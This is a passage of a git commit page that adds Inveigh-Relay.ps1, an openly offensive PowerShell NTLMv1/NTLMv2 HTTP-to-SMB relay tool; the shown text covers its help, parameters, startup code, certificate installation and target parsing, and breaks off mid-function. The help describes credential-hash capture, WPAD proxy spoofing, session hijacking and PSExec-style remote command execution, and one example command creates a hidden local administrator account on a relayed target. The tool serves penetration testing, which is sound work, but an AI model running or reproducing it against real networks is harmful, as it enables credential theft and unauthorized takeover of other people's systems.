aboutsummaryrefslogtreecommitdiff
path: root/Inveigh-Relay.ps1
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
committerKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
commitc9809376e0afb613b3331a79c8ac83c7f48c679a (patch)
treea7b7a36114fb51ea28c4201d838f896aa10427ab /Inveigh-Relay.ps1
parenta2553ac147ceddb23bb85f3e37f9b82c626b6e38 (diff)
downloadInveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.tar.gz
Inveigh-c9809376e0afb613b3331a79c8ac83c7f48c679a.zip
Inveigh 1.41.4
Inveigh Added ADIDNS attacks New detection evasions Inveigh Relay Added session and enumerate attacks Added ability to handle multiple targets with target selection based on the enumerate attack and/or BloodHound imports
Diffstat (limited to 'Inveigh-Relay.ps1')
-rw-r--r--Inveigh-Relay.ps17791
1 files changed, 7791 insertions, 0 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
new file mode 100644
index 0000000..88dbc26
--- /dev/null
+++ b/Inveigh-Relay.ps1
@@ -0,0 +1,7791 @@
+function Invoke-InveighRelay
+{
+<#
+.SYNOPSIS
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
+
+.DESCRIPTION
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
+
+.PARAMETER Attack
+Default = not sure yet: (Enumerate/Execute/Session) Comma seperated list of attacks to perform with relay. Enumerate
+leverages relay to perform enumeration on target systems. The collected data is used for target selection.
+Execute performs PSExec style command execution. Session creates and maintains authenticated SMB sessions that
+can be interacted with through Invoke-TheHash's Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec.
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target.
+
+.PARAMETER Command
+Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a
+shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+
+.PARAMETER ConsoleQueueLimit
+Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER Enumerate
+Default = All: (All/Group/NetSession/Share/User) The action that will be used for the 'Enumerate' attack.
+
+.PARAMETER EnumerateGroup
+Default = Administrators: The group that will be enumerated with the 'Enumerate' attack. Note that only the
+'Administrators' group will be used for targeting decisions.
+
+.PARAMETER Execute
+Command to execute on relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER FailedLoginStrict
+Default = Disabled: If disabled, login attempts against non-domain attached will not count as failed logins. If enabled, all
+failed logins will count.
+
+.PARAMETER FailedLoginThreshold
+Default = 2: The threshold for failed logins. Once failed logins for a user exceed the threshhold, further relay attempts for that
+user will be stopped.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileOutputDirectory
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP/HTTPS listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
+
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
+local administrator access.
+
+.PARAMETER HTTPSPort
+Default = 443: TCP port for the HTTPS listener.
+
+.PARAMETER HTTPSCertIssuer
+Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSCertSubject
+Default = localhost: The subject field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSForceCertDelete
+Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
+HTTPSCertSubject.
+
+.PARAMETER LogOutput
+Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
+
+.PARAMETER ProxyRelay
+Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
+
+.PARAMETER ProxyIP
+Default = Any: IP address for the proxy listener.
+
+.PARAMETER ProxyPort
+Default = 8492: TCP port for the proxy listener.
+
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
+.PARAMETER RelayAutoDisable
+Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
+target.
+
+.PARAMETER RelayAutoExit
+Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
+
+.PARAMETER RepeatEnumerate
+Default = 30 Minutes: The minimum number of minutes to wait between enumeration attempts for a target.
+
+.PARAMETER RepeatExecute
+Default = 30 Minutes: The minumum number of minutes to wait between command execution attempts for a target.
+
+.PARAMETER RunTime
+(Integer) Run time duration in minutes.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER SessionLimitPriv
+Default = 2: Limit of privileged sessions on a target.
+
+.PARAMETER SessionLimitShare
+Default = 2: Limit of sessions per user for targets hosting custom shares.
+
+.PARAMETER SessionLimitUnpriv
+Default = 0: Limit of unprivileged sessions on a target.
+
+.PARAMETER SessionRefresh
+Default = 10 Minutes: The number of minutes between refreshes to keep sessions from timing out.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER Target
+Comma separated list of IP addresses to target for relay. This parameter will accept single addresses, CIDR, or
+ranges on the format of 192.168.0.1-192.168.0.10 or 192.168.0.1-10. Avoid using large ranges with lots of unused
+IP addresses or systems not running SMB. Inveigh-Relay will do quick port checks as part of target selection and
+filter out invalid targets. Something like a /16 with only a few hosts isn't really practical though.
+
+.PARAMETER TargetExclude
+Comma separated list of IP addresses to exlude from the target list. This parameter will accept the same formats as
+the 'Target' parameter.
+
+.PARAMETER TargetMode
+Default = Random: (Random/Strict) 'Random' target mode will fall back to selecting a random target is a match
+isn't found through enumerated data. 'Strict' will only select targets through enumerated data. Note that
+'Strict' requires either previously collected data from the 'Enumerate' attack or data imported from
+BloodHound.
+
+.PARAMETER TargetRandom
+Default = Enabled: (Y/N) Enable/Disable selecting a random target if a target is not found through logic.
+
+.PARAMETER TargetRefresh
+Default = 60 Minutes: Number of minutes to wait before rechecking a target for eligibility.
+
+.PARAMETER Tool
+Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
+
+.PARAMETER Username
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADAuthIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
+popups for authenticated wpad.dat requests such as Firefox.
+
+.EXAMPLE
+Invoke-Inveigh -HTTP N
+Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+#region begin parameters
+
+# Parameter default values can be modified in this section:
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("Enumerate","Session","Execute")][Array]$Attack = ("Enumerate","Session"),
+ [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Enumerate = "All",
+ [parameter(Mandatory=$false)][ValidateSet("Random","Strict")][String]$TargetMode = "Random",
+ [parameter(Mandatory=$false)][String]$EnumerateGroup = "Administrators",
+ [parameter(Mandatory=$false)][Array]$Target = "",
+ [parameter(Mandatory=$false)][Array]$TargetExclude = "",
+ [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
+ [parameter(Mandatory=$false)][Array]$Username = "",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$FailedLoginThreshold = "2",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
+ [parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SessionLimitPriv = "2",
+ [parameter(Mandatory=$false)][Int]$SessionLimitShare = "2",
+ [parameter(Mandatory=$false)][Int]$SessionLimitUnpriv = "0",
+ [parameter(Mandatory=$false)][Int]$SessionRefresh = "10",
+ [parameter(Mandatory=$false)][Int]$TargetRefresh = "60",
+ [parameter(Mandatory=$false)][Int]$RepeatEnumerate = "30",
+ [parameter(Mandatory=$false)][Int]$RepeatExecute = "30",
+ [parameter(Mandatory=$false)][String]$Command = "",
+ [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
+ [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FailedLoginStrict = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SessionPriority = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+#endregion
+#region begin initialization
+
+if ($invalid_parameter)
+{
+ Write-Output "[-] $($invalid_parameter) is not a valid parameter."
+ throw
+}
+
+if($inveigh.relay_running)
+{
+ Write-Output "[-] Inveigh Relay is already running"
+ throw
+}
+
+$inveigh_version = "1.4"
+
+if(!$target -and !$inveigh.enumerate)
+{
+ Write-Output "[-] No enumerated target data, specify targets with -Target"
+ throw
+}
+
+if($ProxyIP -eq '0.0.0.0')
+{
+
+ try
+ {
+ $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ }
+ catch
+ {
+ Write-Output "[-] Error finding proxy IP, specify manually with -ProxyIP"
+ throw
+ }
+
+}
+
+if($Attack -contains 'Execute' -and !$Command)
+{
+ Write-Output "[-] -Command requiried with -Attack Execute"
+ throw
+}
+
+if(!$FileOutputDirectory)
+{
+ $output_directory = $PWD.Path
+}
+else
+{
+ $output_directory = $FileOutputDirectory
+}
+
+if(!$inveigh)
+{
+ $global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.enumerate = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.log = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
+ $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.ADIDNS_table = [HashTable]::Synchronized(@{})
+ $inveigh.relay_failed_login_table = [HashTable]::Synchronized(@{})
+ $inveigh.relay_history_table = [HashTable]::Synchronized(@{})
+ $inveigh.request_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.SMB_session_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
+ $inveigh.group_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
+ $inveigh.session = @()
+}
+
+$inveigh.stop = $false
+
+if(!$inveigh.running)
+{
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+ $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.output_queue = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_input = $true
+ $inveigh.console_output = $false
+ $inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
+ $inveigh.log_output = $true
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+ $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+ $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+ $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
+}
+
+if($StartupChecks -eq 'Y')
+{
+
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+
+ if($HTTP -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+ }
+
+ if($HTTPS -eq 'Y')
+ {
+ $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
+ }
+
+ if($Proxy -eq 'Y')
+ {
+ $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
+ }
+
+}
+
+$inveigh.relay_running = $true
+$inveigh.SMB_relay = $true
+
+if($StatusOutput -eq 'Y')
+{
+ $inveigh.status_output = $true
+}
+else
+{
+ $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+ $inveigh.output_stream_only = $true
+}
+else
+{
+ $inveigh.output_stream_only = $false
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+ $inveigh.tool = 1
+ $inveigh.output_stream_only = $true
+ $inveigh.newline = $null
+ $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+ $inveigh.tool = 2
+ $inveigh.output_stream_only = $true
+ $inveigh.console_input = $false
+ $inveigh.newline = $null
+ $LogOutput = "N"
+ $ShowHelp = "N"
+
+ switch ($ConsoleOutput)
+ {
+
+ 'Low'
+ {
+ $ConsoleOutput = "Low"
+ }
+
+ 'Medium'
+ {
+ $ConsoleOutput = "Medium"
+ }
+
+ default
+ {
+ $ConsoleOutput = "Y"
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.tool = 0
+ $inveigh.newline = $null
+}
+
+#endregion
+#region begin startup messages
+$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
+
+if($firewall_status)
+{
+ $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null
+}
+
+if($HTTP -eq 'Y')
+{
+
+ if($HTTP_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[-] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Enabled") > $null
+
+ if($HTTPIP)
+ {
+ $inveigh.output_queue.Add("[+] HTTP IP Address = $HTTPIP") > $null
+ }
+
+ if($HTTPPort -ne 80)
+ {
+ $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null
+ }
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Disabled") > $null
+}
+
+if($HTTPS -eq 'Y')
+{
+
+ if($HTTPS_port_check)
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
+ }
+ else
+ {
+
+ try
+ {
+ $inveigh.certificate_issuer = $HTTPSCertIssuer
+ $inveigh.certificate_CN = $HTTPSCertSubject
+ $inveigh.output_queue.Add("[+] HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.output_queue.Add("[+] HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+
+ if(!$certificate_check)
+ {
+ # credit to subTee for cert creation code from Interceptor
+ $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
+ $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
+ $certificate_key.KeySpec = 2
+ $certificate_key.Length = 2048
+ $certificate_key.MachineContext = 1
+ $certificate_key.Create()
+ $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
+ $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
+ $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
+ $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
+ $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
+ $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
+ $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
+ $certificate.Subject = $certificate_distinguished_name
+ $certificate.Issuer = $certificate_issuer_distinguished_name
+ $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
+ $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
+ $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
+ $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
+ $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
+ $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
+ $certificate_basic_constraints.InitializeEncode("true",1)
+ $certificate.X509Extensions.Add($certificate_basic_constraints)
+ $certificate.Encode()
+ $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
+ $certificate_enrollment.InitializeFromRequest($certificate)
+ $certificate_data = $certificate_enrollment.CreateRequest(0)
+ $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
+ $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+ $inveigh.HTTPS = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Enabled") > $null
+ }
+ else
+ {
+
+ if($HTTPSForceCertDelete -eq 'Y')
+ {
+ $inveigh.HTTPS_force_certificate_delete = $true
+ }
+
+ $inveigh.HTTPS_existing_certificate = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null
+ }
+
+ }
+ catch
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Disabled") > $null
+}
+
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
+{
+
+ if($Challenge)
+ {
+ $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null
+ }
+
+ if($MachineAccounts -eq 'N')
+ {
+ $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null
+ $inveigh.machine_accounts = $false
+ }
+ else
+ {
+ $inveigh.machine_accounts = $true
+ }
+
+ $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null
+
+ if($WPADAuth -eq "NTLM")
+ {
+ $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($WPADAuthIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
+ }
+
+ }
+
+}
+
+if($Proxy -eq 'Y')
+{
+
+ if($proxy_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null
+ $ProxyPortFailover = $ProxyPort + 1
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ }
+
+ }
+
+}
+
+$inveigh.output_queue.Add("[+] Relay Attack = " + ($Attack -join ",")) > $null
+
+# math taken from https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b
+
+function Convert-RangetoIPList
+{
+ param($IP,$CIDR,$Start,$End)
+
+ function Convert-IPtoINT64
+ {
+ param($IP)
+
+ $octets = $IP.split(".")
+
+ return [int64]([int64]$octets[0] * 16777216 + [int64]$octets[1]*65536 + [int64]$octets[2] * 256 + [int64]$octets[3])
+ }
+
+ function Convert-INT64toIP
+ {
+ param ([int64]$int)
+ return (([math]::truncate($int/16777216)).tostring() + "." +([math]::truncate(($int%16777216)/65536)).tostring() + "." + ([math]::truncate(($int%65536)/256)).tostring() + "." +([math]::truncate($int%256)).tostring())
+ }
+
+ $target_list = New-Object System.Collections.ArrayList
+
+ if($IP)
+ {
+ $IP_address = [System.Net.IPAddress]::Parse($IP)
+ }
+
+ if($CIDR)
+ {
+ $mask_address = [System.Net.IPAddress]::Parse((Convert-INT64toIP -int ([convert]::ToInt64(("1" * $CIDR + "0" * (32 - $CIDR)),2))))
+ }
+
+ if($IP)
+ {
+ $network_address = New-Object System.Net.IPAddress ($mask_address.address -band $IP_address.address)
+ }
+
+ if($IP)
+ {
+ $broadcast_address = New-Object System.Net.IPAddress (([System.Net.IPAddress]::parse("255.255.255.255").address -bxor $mask_address.address -bor $network_address.address))
+ }
+
+ if($IP)
+ {
+ $start_address = Convert-IPtoINT64 -ip $network_address.IPAddressToString
+ $end_address = Convert-IPtoINT64 -ip $broadcast_address.IPAddressToString
+ }
+ else
+ {
+ $start_address = Convert-IPtoINT64 -ip $start
+ $end_address = Convert-IPtoINT64 -ip $end
+ }
+
+ for($i = $start_address; $i -le $end_address; $i++)
+ {
+ $IP_address = Convert-INT64toIP -int $i
+ $target_list.Add($IP_address) > $null
+ }
+
+ if($network_address)
+ {
+ $target_list.Remove($network_address.IPAddressToString)
+ }
+
+ if($broadcast_address)
+ {
+ $target_list.Remove($broadcast_address.IPAddressToString)
+ }
+
+ return $target_list
+}
+
+function Get-TargetList
+{
+ param($targets)
+
+ $target_list = New-Object System.Collections.ArrayList
+
+ for($i=0;$i -lt $targets.Count;$i++)
+ {
+
+ if($targets[$i] -like "*-*")
+ {
+ $target_array = $targets[$i].split("-")
+
+ if($target_array[0] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" -and
+ $target_array[1] -notmatch "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b")
+ {
+
+ if($target_array.Count -ne 2 -or $target_array[1] -notmatch "^[\d]+$" -or $target_array[1] -gt 254)
+ {
+ Write-Output "[!] Invalid target $($target[$i])"
+ throw
+ }
+ else
+ {
+ $IP_network_begin = $target_array[0].ToCharArray()
+ [Array]::Reverse($IP_network_begin)
+ $IP_network_begin = -join($IP_network_begin)
+ $IP_network_begin = $IP_network_begin.SubString($IP_network_begin.IndexOf("."))
+ $IP_network_begin = $IP_network_begin.ToCharArray()
+ [Array]::Reverse($IP_network_begin)
+ $IP_network_begin = -join($IP_network_begin)
+ $IP_range_end = $IP_network_begin + $target_array[1]
+ $targets[$i] = $target_array[0] + "-" + $IP_range_end
+ }
+
+ }
+
+ }
+
+ }
+
+ ForEach($entry in $targets)
+ {
+ $entry_split = $null
+
+ if($entry.contains("/"))
+ {
+ $entry_split = $entry.Split("/")
+ $IP = $entry_split[0]
+ $CIDR = $entry_split[1]
+ $target_list.AddRange($(Convert-RangetoIPList -IP $IP -CIDR $CIDR))
+ }
+ elseif($entry.contains("-"))
+ {
+ $entry_split = $entry.Split("-")
+
+ if($entry_split[0] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" -and
+ $entry_split[1] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b")
+ {
+ $start_address = $entry_split[0]
+ $end_address = $entry_split[1]
+ $target_list.AddRange($(Convert-RangetoIPList -Start $start_address -End $end_address))
+ }
+ else
+ {
+ $target_list.Add($entry) > $null
+ }
+
